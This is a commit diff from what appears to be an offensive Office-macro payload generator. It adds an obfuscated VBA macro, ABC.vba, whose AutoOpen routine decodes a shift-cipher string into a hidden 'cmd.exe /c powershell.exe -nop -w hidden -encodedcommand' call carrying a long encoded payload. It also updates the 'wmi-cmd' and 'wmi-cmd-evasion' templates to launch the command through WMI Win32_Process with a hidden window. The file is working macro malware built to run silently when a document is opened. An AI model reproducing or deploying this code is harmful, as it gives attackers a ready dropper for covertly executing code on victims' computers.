Updated WMI to hide window

ABC.vba

@@ -0,0 +1,135 @@
+
+
+
+
+
+Sub AutoOpen()
+	Dim qrMsPEfZZxQtuT As String
+	Dim uqESZvZWU As Object
+	Dim YcCVBPFAXEgRZJKMArhrq As Integer
+	Dim ilttqSzePLIB As String
+	Dim PSxgNvQbzD as String
+	
+	YcCVBPFAXEgRZJKMArhrq = 6438
+	PSxgNvQbzD = CALGUwZkIjKgysDPyM("BpYPdusgPtDSBdRIRfluMvJ")
+	Set uqESZvZWU = GetObject(PSxgNvQbzD)
+	ilttqSzePLIB = CZExVbvjSNaN("BpYPdusgPtDSBdRIRfluMvJ")
+	ilttqSzePLIB = XItmeSMLzMDoEt(uqESZvZWU, ilttqSzePLIB, YcCVBPFAXEgRZJKMArhrq)
+End Sub
+
+Function CZExVbvjSNaN(wCqKU As String) As String
+	Dim gcGCwobmOwetmyCIXerNTAZ As String
+	Dim yntZzVvZZccetYiLF As String
+	Dim wzfXnd As String
+	wzfXnd = "fpg1h{h#2f#srzhuvkhoo1h{h#0qrs#0z#klgghq#0hqfrghgfrppdqg#MDE}DG3DWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDH3D]TEwDJ;DfjE8DIPDgDE|DJXD\TEwDFjDODEeDHPDezExDK\D]TE|DKTD[TD9DGrDUjE|DJ;DeTEFDJHDfzEoDG\DQDEWDKT"
+	Dim mnZGckHXWkbNuHfHEs As String
+	mnZGckHXWkbNuHfHEs = "DfjEsDJ7D]zDrDFLDVDD3DKPDVTEEDHHDTTEEDHHDTTEEDHHDTTEPDGHDZDEkDIfDOzElDH;DTjETDFvDVDETDGjDVzE]DILDUjEEDHXDgTE|DGTD\jEzDJ;DYTEGDH\DUDEODKTDNzE}DKLDeDEsDGHD]jEkDKjDdTDzDIPDWTE3DH3DVzERDHfDYjEODHTDgjESDKT"
+	Dim EudNeKPlPnTvhZmQa As String
+	EudNeKPlPnTvhZmQa = "DgjD8DGnDXjD4DHzD]DE4DKDDgDDzDGPDhDEUDHzDgjEEDHnDUTEYDH;DYDEQDJPDWzEkDIrDYTE8DJHDYjEZDG\D\jDzDJ3DXzDzDGfD]zEvDHTDeDE8DKHDVjDuDKfDVTEWDJ7DUjEJDHvDfDE8DGTDfDEyDIPDgTEZDH;DNzEkDIPDeTD{DKHDUjExDKnDPjEqDGf"
+	Dim WTksSoRlwX As String
+	WTksSoRlwX = "DYzEsDKfD]DEODKDD]DElDIjDRTErDHzDYDEMDJjDXDEqDGDDUDD4DHvDPzE\DILDhDE9DGXDPjEJDJXDPTE8DJjDOzD|DJzDVzDzDJrDVTEkDI\DfTENDIDDhTENDHPDXzEuDHvD]jD5DJjD\zE\DKHDZTE3DGTDVzDyDIHDTzE5DHvDZjEPDHTDPDE4DGLDezDzDKX"
+	Dim XOKupOohTiUtGeW As String
+	XOKupOohTiUtGeW = "DZDE8DJ;DPDEqDHHDYjE8DJvDhjEnDH\DPjE[DKjDUTE4DIrDgDD6DJnDQDD7DJTDhTD5DIDDgjEYDJvDRDEvDGPDfDEuDGTDeDEGDJfDWDE{DKLDdjEsDJrD]zEkDInDfjE\DGXDZDE7DJjDgjE|DGDDfTE|DJTDQjEyDHzDZjEYDF;DeDEMDKXDeDD4DJvDQjEJDKn"
+	Dim ZJdTS As String
+	ZJdTS = "DgjEQDJrDPjEWDHjDWTE|DInDPzE]DHLDUDE8DIPDVDEXDIfDUjEtDJHDWzEPDH3DdTE]DIfDRDD5DJvDfDE5DGfDQTEzDG\DfjETDKLDOzEODHzDYDETDI\DWDEsDHjDeTEqDKHD]TE]DJjDdzERDITDWjEIDH3DQTEZDIjD]jEwDJ3DXjE7DJPDWzEHDGHDgTE{DKH"
+	Dim VSGtpb As String
+	VSGtpb = "DXjD{DJ3DNzE8DHnDXTEkDGXDdzEdDH3DQjD8DInDhTEMDKjDdTD6DJLDgTE7DGjDfDD{DHXD]DD{DI\DXDEqDIfDPDDuDJzD\TELDK\DVzElDGjDPjEQDIrDVzEdDJPDUzEqDKHDWDETDKXDTTEHDHXDezEUDI\DXDEZDH3DPDD8DKXDVjEVDG\DfDEnDJXDdTELDJ7"
+	Dim toAFlzFGwBIhanWofu As String
+	toAFlzFGwBIhanWofu = "D\TEoDIfDYDERDJrDRDE{DH7DTTEqDGnDhTEZDKfDVzD4DGXDWDD5DInDeTE3DIPD]jD7DJTDfzEKDJ3DXTEkDGLDTzESDJPDUDE4DJjDQjEyDIjDZDEzDF;DezEXDHTDYzD4DJ3DPDEmDKnD\TEqDG\DdzE3DJ\DYDE7DF;D]DD8DKjD\jEnDH;DQzEKDHzDUTD}DHf"
+	Dim FYCKEzBdOtzBx As String
+	FYCKEzBdOtzBx = "DfTDyDJzDWDD6DKPDhjEtDIHDQDE\DJvDXjEGDGPDfjE{DIfDNzE{DI\DfTEGDHvDYTEYDKfD]DEPDKXDfDEUDHHDOzEZDJzDZTEzDIPDQDE4DGXDgjEKDIPD]zEtDGHD\TE\DKfDXTE}DGXDfjE3DITD\zEwDJ3DeDEEDGDDfDEqDHvD]jE6DHTD]jEJDGTDWzDyDIr"
+	Dim lObUCjU As String
+	lObUCjU = "DUDE{DHPDPjEYDJXDgTE[DG\DNzE[DHLDhTE5DIDDZDEIDHfDQjEZDGjDVzE8DKDDNzD3DJrDdjE8DHrDWTE7DH3DRTD6DKDDXzD4DHrDXjErDIrDfDEGDGXDdTETDGjD]jExDGDD\zEJDKnDUjEXDHrDWzE{DHLDRDEVDF;DUDEzDKnDVzD}DITDWjETDH\DezD4DJX"
+	Dim mxATuPixshP As String
+	mxATuPixshP = "DWjErDJzDRTEsDJvDQDE3DJTD]TEmDILDgDEoDJPDhDEyDHLDdzEXDJ3DXjEnDIXDUjEVDITDdjE6DJXDYTEZDHnDQzE6DKHDTjEKDJnDRDD4DJTDfzEZDIrD]jENDGfDQzE7DHfDezErDKnDhTE6DJ\DUTEFDJHDTTEYDKjDezEpDFvDfzEXDH;DVjEIDITDYzD{DG\"
+	Dim rbJHrFGH As String
+	rbJHrFGH = "DVDEoDJ;DTzEqDH3DeTD}DHPDfzD4DJHDXTDzDKLDXTEIDF;DYTE7DHTDXTD5DJ7DPjD5DH7DgjEMDH\DWDEPDHjDTTEnDHLDYzE4DJ3DVDEuDHrDWjD|DIfDdjEIDKDDQTEzDIPDdzEJDJXDXTEJDGfDVDEsDHXDXTEsDJ7DdTEzDJ\DfDEHDGPDYTD6DHnDVjElDH7"
+	Dim oLwCJ As String
+	oLwCJ = "DhDEMDHXDOzEsDH\DgjEyDKLDdzEFDG\DgjEPDJfDfzE5DJvDVDD4DJ;D]zD}DKPDTjErDKHDUzD4DKDDYDElDHTDXDEIDHnDeDE|DITDXTE]DJ;D\zElDHLDZjEQDGXDVjEFDJ\DYjEZDITDWTE{DInD\zDuDInDQTEMDHfDdzELDIDDezEKDJTDTzEEDKTDYDEVDJv"
+	Dim xUdZsFglujHSJ As String
+	xUdZsFglujHSJ = "DVDEtDJvDOzEUDF;DTTDzDITDXDEwDH\DXTD|DGPDXzD|DJ7DWDEvDHTDVDEJDJHDXDEKDKPDXTETDGHDQDEdDJjDXzEmDJLDhDErDJjDhDEPDGHDZDD8DIHDNzENDIXDfTEWDH\DXjEJDIfDVjD4DHTDWzEvDHnDZTEEDH3DWDEwDIHD\TEmDI\DdTE5DJ;DXTEkDKD"
+	Dim BUOFvFtXpWYOxqwsmCr As String
+	BUOFvFtXpWYOxqwsmCr = "DVzEdDJ\DXjERDGXDOzEZDH;DOzExDJvDgjEWDITDejEwDIfD]jELDJrDPjEzDKjD\TEuDGTDWjE6DGTDhTEWDKDDdTE]DGDDezD3DG\DgzEnDGHDPzEQDHfDXDEyDJ\DTTEwDKfDPTE\DKrDdDEKDJrDdTEqDGHDQjE[DJ;DZjE\DJnDWzD8DJvD]TD|DKjDPTEyDHn"
+	Dim SOtEKNXgEZHXFGCxhWp As String
+	SOtEKNXgEZHXFGCxhWp = "DejEwDJ7DYDD3DKjDPzEWDJXDeTEXDGXDQTErDGfD]TEHDKLDgzEtDI\DeTE8DHvDhTEqDJ\DhTE4DJ\DZDEUDKnDVDElDKPD\zE3DHPDgjD{DGLDQDEUDGLDhjE3DGfDNzD5DJHDWDD6DHTDYzD6DKHD\jEYDJ3DXTELDJ\DXDEmDKPDPDElDILDWTE|DKTDNzE6DJH"
+	Dim ZrrulF As String
+	ZrrulF = "DfjD6DILDgTEHDKrDQDEqDInDfzESDJTDWTE[DJTDQTE7DHXDWzEuDF;DRTEODKTDgTE4DGnDfzEQDJrDXDE7DILDYDE}DHrDgjEvDGDDfTERDIPDXTD3DI\DdTD5DI\D]TEQDJ\D]DEMDJHDTzE4DJnD]jDzDIPDdzD5DGfDWDD8DIXDhDE5DIfDYTEJDKTDQzElDIH"
+	Dim TatdI As String
+	TatdI = "DXDD3DJPDdzD{DJXD\jEdDIXDVDE{DGPDUzErDH7DdDE5DKrDXjE|DIrDYTD|DG\DhjELDHnDdjEGDK\DXzE9DH;DTzD5DFvDRDD4DIHDZTE]DJfDTjEVDGXDdTEkDKnDTzEKDHTD]DE}DGHDfzEvDJ7DfjE4DJjDeDEdDIrDZDEVDIjDhDEoDGHDPjEZDIjDOzEkDKT"
+	Dim CiIGaZrrUJq As String
+	CiIGaZrrUJq = "DVjDyDK\DgzDzDGTDZjEsDIfDejErDI\DgDE|DGHDYzEqDG\DXDE[DGjDUjE}DHfDUDErDHTDfTD8DKPD\TEwDHvDdjEYDJ\DdzEEDJ\DeTEtDIfDhTE\DJLDeTEHDHjDXzEvDGLDejEGDHfDOzEnDGfDfDEwDG\D\TEvDGPDWTEIDJHDPjE8DKjDRTExDGTDOzEoDGX"
+	Dim ODsyVBQ As String
+	ODsyVBQ = "DYzEIDInDeDEmDHXDZjE[DKLD\jEyDKHDdzExDHLDYjE5DGnDPzEQDKnDfTEtDInD]TEoDGXDRDEkDH\DZjD4DH;DVDERDK\DQzD5DJXDYDEqDIfD]zDyDH7DWDEoDJ;DgDEzDJ3DWzEpDFvDWjEJDKTD\zEoDJ7D\jENDGXDWTE|DHTDgzEdDGTDWTEzDGLDYDETDHX"
+	Dim TCUdXv As String
+	TCUdXv = "DQjEwDG\D]jE4DH3DWDENDJnDOzERDKjDezE6DIrDPTEpDIXDWDD3DGLDgzESDGPDTTEEDHzDgTEKDJ;DOzEzDJ3DgzEwDJLDZjEoDK\DZjD|DGPDWjE{DF;DdzD8DJ\DdjE]DJPDWTEmDKXDXTD6DKHD]jEGDJzDZDEVDGfDhDEvDJrDfTE9DIfDXDEoDGXDVjE{DF;"
+	Dim KMoGxtpQUro As String
+	KMoGxtpQUro = "DPjE6DKnDNzEkDJ7DZDErDGDDPzDzDITDWjEGDGXDYjEkDKDDWDE{DKHDdjE4DJzDdDElDGfDdTE]DF;DPjEJDGTDUDDyDFvDdDDzDGfDhDEsDIjD\zDyDI\DQjEMDG\DVzEpDHnDUjENDGHDejE|DHvDeDEWDInDUTEqDKPDOzE[DH;DTjEsDGPDRDD|DJHDNzEZDJX"
+	Dim rocwFyWRtPwPRPha As String
+	rocwFyWRtPwPRPha = "DUDEKDIPDZjEoDHTDfTEkDHTDWTEFDIjDNzEkDHjDdjEkDKjDYjEIDHnDPjEVDH7D\jE5DHjD\jEXDHnDfDEMDJXDTjEnDGPD\TEHDGLDVDE{DHfD]TEXDJ\DVjEKDGDDQTE3DJXDeDD7DILDYDD8DJzDPTEqDIjD]TEmDGjDQDEkDKnDhjD|DJXDhjErDGXDejEuDGD"
+	Dim hPgycfYYOoBWU As String
+	hPgycfYYOoBWU = "DVTEVDKXDgzEUDJTDhTDzDKjDRDE9DJHDZjEWDGPDRDEkDHHD]zEIDI\DfTEKDG\D]zD{DHHDYjEMDJHDgTE6DJ3DYzD4DKLD]jEUDG\DPjEHDIXD]jD4DIjDgTE3DGnDejEqDJjDYTErDK\DWjEkDJTDQDE8DH7DhjD|DH7DUzD|DGTDeTESDJ7DYTEPDJLDPjEHDJP"
+	Dim XeZIz As String
+	XeZIz = "DfTEKDGnDgjEMDK\DQzEmDJXDVzE3DJTDUzEIDIPDQjD3DHjDYTD6DHLDYjD6DH7DXjEsDG\DRTEmDKnDRDE[DITDgzE\DIDD\jD6DJXDQTE[DGnDNzEtDKXDUDDzDJnDfDEsDGHDXzEmDHnD\TE3DKfDgjEYDGfDfTDyDK\DRTEyDKXDTjD}DKPDTjE7DK\DWTEMDIj"
+	Dim rNZPTj As String
+	rNZPTj = "D]TEqDJHDZjD3DKHDZDEuDGPDQDE3DIfDXDE|DG\DgzE}DIfD\zE[DJrD\TD5DGTDXDEZDHnDOzEYDGnDhTEwDHjDezEqDHzDVDEuDI\DTzEmDIHDQTD7DHvDWzEwDK\DYTE5DKXDdTEkDH3DUDEuDJzDUDE\DGDDTTD8DHjDWTEKDKnDYzELDJjDPTEzDIPDgjEpDHP"
+	Dim vjBIpylQJaWcNEJuYfT As String
+	vjBIpylQJaWcNEJuYfT = "D]jEYDJ\DVDEpDKnDPDD8DJ\DVDEtDHTDTTE6DGXDUjE{DHPDezEMDHfDYDEkDGHDVDETDJvDVjEzDGHDQzEODKXDZjE8DGDDVDEdDKrDYDD5DIfD\zExDJ7DfTD6DF;DYzE[DKjDXDE[DJrD]jEzDJHDYzEtDKrDejDzDHfDQTEpDJzDUjETDHzDQTEMDITDhTEZDIH"
+	Dim OdDSGBVqnrmBACID As String
+	OdDSGBVqnrmBACID = "D\jDuDIHDUzEkDJjDZDD4DIDDPjERDGnDfjEMDF;DhDD{DJLDNzETDGnDZTDuDGnD]jE9DJzDRTEIDF;DQjD4DGnDUDEvDHnDWDE6DGXDOzD}DK\D]zEnDJTDOzE7DGPDdTEQDJHDZTEWDIfDTTD{DJ;DXTD8DKfDeTEuDKfDhTElDGDDZDE{DHfDVTEFDJ7D\zDuDH;"
+	Dim WNIquUYGkUpecPQbus As String
+	WNIquUYGkUpecPQbus = "DZjEzDKnDVDEGDGHDfzEmDJ7DUzE5DH7DQzEyDJLDhjE{DKfDeDEWDIrDYTEtDFvDeDEYDKPDPjD{DJPDezEdDIHDgzENDGXDdDE6DHvD]DEpDJzDTjE}DGnDeTErDIXDUDEsDIjDPTD4DGnDXzEFDIfDRDEHDJPDXTE3DGDDhjE3DHXDgTE3DHvDfzE9DKDDXjEPDKL"
+	Dim qDnmSyPstQKrJ As String
+	qDnmSyPstQKrJ = "DVDE8DITD\jEuDHPDYTEJDHLDXTEPDH3DTTE5DJfD]TDuDHXDYTEpDGnDYTEuDJrDNzEmDKLDRDEyDJXDYDEMDJvDZjE5DKnDezEHDJHDeDEQDInD]TD5DGnD\TE]DJfDYjD8DJvD\zEMDInDUjEMDJ3DWzErDIXDYDEIDKPDXDEmDGPDZjEQDJPDRTEJDITDVTERDHH"
+	Dim xgLjcClnFUTCUj As String
+	xgLjcClnFUTCUj = "DTTEEDG3DLjDsDFnDRzEMDHXDZDDjDFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDIPDgDE|DJXD\TEwDILD]TEkDJTD]TE|DFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHfDhjEsDKDDXzE3DKLD]TEkDJ3"
+	Dim IEgSKWOU As String
+	IEgSKWOU = "DNDDnDKPDODEeDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejEQDJ;D]DEoDI3DRjD9DHTD]TEmDJ;DeTEzDKLD]TE}DKPDNTDsDFnDOjEVDJXD\TEnDITDezEIDJ7D]DDrDFnDRzD@"
+
+	gcGCwobmOwetmyCIXerNTAZ = wzfXnd & mnZGckHXWkbNuHfHEs & EudNeKPlPnTvhZmQa & WTksSoRlwX & XOKupOohTiUtGeW & ZJdTS & VSGtpb & toAFlzFGwBIhanWofu & FYCKEzBdOtzBx & lObUCjU & mxATuPixshP & rbJHrFGH & oLwCJ & xUdZsFglujHSJ & BUOFvFtXpWYOxqwsmCr & SOtEKNXgEZHXFGCxhWp & ZrrulF & TatdI & CiIGaZrrUJq & ODsyVBQ & TCUdXv & KMoGxtpQUro & rocwFyWRtPwPRPha & hPgycfYYOoBWU & XeZIz & rNZPTj & vjBIpylQJaWcNEJuYfT & OdDSGBVqnrmBACID & WNIquUYGkUpecPQbus & qDnmSyPstQKrJ & xgLjcClnFUTCUj & IEgSKWOU
+	gcGCwobmOwetmyCIXerNTAZ = IMahev(gcGCwobmOwetmyCIXerNTAZ)
+	CZExVbvjSNaN = gcGCwobmOwetmyCIXerNTAZ
+End Function
+
+Function pONpYabIh() As String
+	Dim RoPgdoevhhFCaiNBT As String
+	RoPgdoevhhFCaiNBT = IMahev("zlqpjpwv=urrw2flpy5")
+	pONpYabIh = RoPgdoevhhFCaiNBT
+End Function
+
+Function XItmeSMLzMDoEt(DitexWndjefju As Object, AoUcUHL As String, MaqkRfyEkIEOdd As Integer) As String
+	Dim CoGsxQyIbBgiQjA As String
+	Dim ApcjiM As Integer
+	Dim mJkTVsNh As Integer
+	Dim JCSnEYzttQSwVdV As Integer
+	ApcjiM = 8
+	CoGsxQyIbBgiQjA = AoUcUHL
+    If (MaqkRfyEkIEOdd > ApcjiM) Then
+		Set SujUrYCEsfPsr = GetObject(pONpYabIh())
+		Set wugrVNYqPPGxXSamhLnkS = SujUrYCEsfPsr.Get(IMahev("Zlq65bSurfhvvVwduwxs"))
+		Set qNgUfERIEAKODVyxb = wugrVNYqPPGxXSamhLnkS.SpawnInstance_
+		ApcjiM = MaqkRfyEkIEOdd - MaqkRfyEkIEOdd
+		ApcjiM = ApcjiM + 12
+		qNgUfERIEAKODVyxb.ShowWindow = ApcjiM
+		JCSnEYzttQSwVdV = DitexWndjefju.Create(CoGsxQyIbBgiQjA, null, qNgUfERIEAKODVyxb, mJkTVsNh)
+	End If
+	CoGsxQyIbBgiQjA = "hNlKxakwGfktPoqaeyQLcP"
+	XItmeSMLzMDoEt = CoGsxQyIbBgiQjA
+End Function
+
+Function CALGUwZkIjKgysDPyM(DlzhqGHNiEuPevnJzPtk As String) As String
+	Dim sPMdZm As String
+	sPMdZm = IMahev("zlqpjpwv=Zlq65bSurfhvv")
+	CALGUwZkIjKgysDPyM = sPMdZm
+End Function
+
+
+Function IMahev(xwMbMkcLWXnfGMLtZe As String) As String
+	Dim yPccVGSEMWlIDSPolPnWurpD As Long
+	Dim uXFhTeVPXvr As String
+	Dim mJuCgbCXWnphqwwoRWoNWyzB As Integer
+	mJuCgbCXWnphqwwoRWoNWyzB = 3
+	For yPccVGSEMWlIDSPolPnWurpD = 1 To Len(xwMbMkcLWXnfGMLtZe)
+		uXFhTeVPXvr = uXFhTeVPXvr & Chr(Asc(Mid(xwMbMkcLWXnfGMLtZe, yPccVGSEMWlIDSPolPnWurpD, 1)) - mJuCgbCXWnphqwwoRWoNWyzB)
+	Next yPccVGSEMWlIDSPolPnWurpD
+	IMahev = uXFhTeVPXvr
+End Function

templates/payloads/wmi-cmd-evasion-template.vba

@@ -1,7 +1,7 @@
 [use:payload_wrapper]
 [use:exec]
 [use:init_wmi]
-
+[use:init_properties]
 Sub AutoOpen()
 	Dim var1 As String
 	Dim var2 As Object
@@ -27,21 +27,34 @@ Function payload_wrapper(payload_wrapper1 As String) As String
 	payload_wrapper = payload_wrapper2
 End Function
 
+Function init_properties() As String
+        Dim init_properties1 As String
+        init_properties1 = decode("{[winmgmts:root/cimv2]}")
+        init_properties = init_properties1
+End Function
+
 Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
-	Dim exec4 As String
+        Dim exec4 As String
-	Dim exec5 As Integer
+        Dim exec5 As Integer
-	exec5 = [smallint1]
+        Dim exec13 As Integer
-	exec4 = exec2
+        Dim exec14 As Integer
+        exec5 = [smallint1]
+        exec4 = exec2
     If (exec3 > exec5) Then
-		exec5 = exec3 - exec3
+                Set exec10 = GetObject(init_properties())
-		exec1.Create(exec4)
+                Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
-	End If
+                Set exec12 = exec11.SpawnInstance_
-	exec4 = "exec6"
+                exec5 = exec3 - exec3
-	exec = exec4
+                exec5 = exec5 + 12
+                exec12.ShowWindow = exec5
+                exec14 = exec1.Create(exec4, null, exec12, exec13)
+        End If
+        exec4 = "exec6"
+        exec = exec4
 End Function
 
 Function init_wmi(init_wmi1 As String) As String
 	Dim init_wmi2 As String
 	init_wmi2 = decode("{[winmgmts:Win32_Process]}")
     init_wmi = init_wmi2
-End Function
+End Function

templates/payloads/wmi-cmd-template.vba

@@ -1,6 +1,7 @@
 [use:payload_wrapper]
 [use:exec]
 [use:init_wmi]
+[use:init_properties]
 
 Sub AutoOpen()
 	Dim var1 As String
@@ -24,14 +25,27 @@ Function payload_wrapper(payload_wrapper1 As String) As String
 	payload_wrapper = payload_wrapper2
 End Function
 
+Function init_properties() As String
+	Dim init_properties1 As String
+	init_properties1 = decode("{[winmgmts:root/cimv2]}")
+	init_properties = init_properties1
+End Function
+
 Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
 	Dim exec4 As String
 	Dim exec5 As Integer
+	Dim exec13 As Integer
+	Dim exec14 As Integer
 	exec5 = [smallint1]
 	exec4 = exec2
     If (exec3 > exec5) Then
+		Set exec10 = GetObject(init_properties())
+		Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
+		Set exec12 = exec11.SpawnInstance_
 		exec5 = exec3 - exec3
-		exec1.Create(exec4)
+		exec5 = exec5 + 12
+		exec12.ShowWindow = exec5
+		exec14 = exec1.Create(exec4, null, exec12, exec13)
 	End If
 	exec4 = "exec6"
 	exec = exec4
@@ -40,5 +54,5 @@ End Function
 Function init_wmi(init_wmi1 As String) As String
 	Dim init_wmi2 As String
 	init_wmi2 = decode("{[winmgmts:Win32_Process]}")
-    init_wmi = init_wmi2
+	init_wmi = init_wmi2
 End Function